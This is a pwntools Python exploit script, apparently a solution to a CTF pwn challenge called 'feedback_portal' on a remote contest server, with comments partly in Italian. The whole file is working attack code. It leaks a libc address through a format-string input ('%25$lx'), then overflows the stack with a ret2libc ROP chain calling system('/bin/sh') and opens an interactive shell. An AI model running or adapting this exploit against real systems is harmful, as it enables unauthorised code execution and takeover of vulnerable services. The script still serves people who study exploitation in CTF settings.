50 lines
1.4 KiB
Python
50 lines
1.4 KiB
Python
#!/usr/bin/env python3
|
|
from pwn import *
|
|
context.binary = elf = ELF('./feedback_portal', checksec=False)
|
|
# Change if on server
|
|
|
|
libc = ELF('libc.so.6', checksec=False)
|
|
#libc = ELF('/usr/lib/libc.so.6', checksec=False)
|
|
OFFSET_TO_RIP = 128 + 8
|
|
RET = 0x40101a
|
|
#libc_call = libc.sym['__libc_start_main']
|
|
libc_call = 0x29d90
|
|
# local libc
|
|
#POP_RDI = 0x10269a
|
|
# remote libc
|
|
POP_RDI = 0x10f78b
|
|
BINSH = next(libc.search(b'/bin/sh\x00'))
|
|
|
|
#p = process(elf.path)
|
|
p = remote("offsec.m0lecon.it", 13595)
|
|
|
|
p.recvuntil(b'Please enter your name:\n')
|
|
# __libc_start_main (non funziona in remoto)
|
|
#p.sendline(b"%47$lx")
|
|
# __libc_start_call_main
|
|
p.sendline(b"%25$lx")
|
|
|
|
libc_start_main = p.recvline().split(b',')[1].strip()
|
|
libc_start_main = b'0x' + libc_start_main
|
|
libc_start_main = int(libc_start_main, 16)
|
|
|
|
#libc_address = libc_start_main - libc_call - 128 - 8
|
|
print(f"Libc start main dropped:{hex(libc_start_main)}")
|
|
print(f"Libc start main from symbol:{hex(libc_call)}")
|
|
print(f"BINSH:{hex(BINSH)}")
|
|
libc_address = (libc_start_main - libc_call) & ~0xfff
|
|
print(f"Addr: {hex(libc_address)}")
|
|
libc.address = libc_address
|
|
print(p.recvuntil(b'Now leave your feedback:\n'))
|
|
payload = flat(
|
|
b'A' * OFFSET_TO_RIP,
|
|
p64(RET),
|
|
#elf.symbols["main"],
|
|
p64(libc_address + POP_RDI),
|
|
p64(libc_address + BINSH),
|
|
libc.symbols["system"]
|
|
)
|
|
p.send(payload)
|
|
#print(p.recvline())
|
|
p.interactive()
|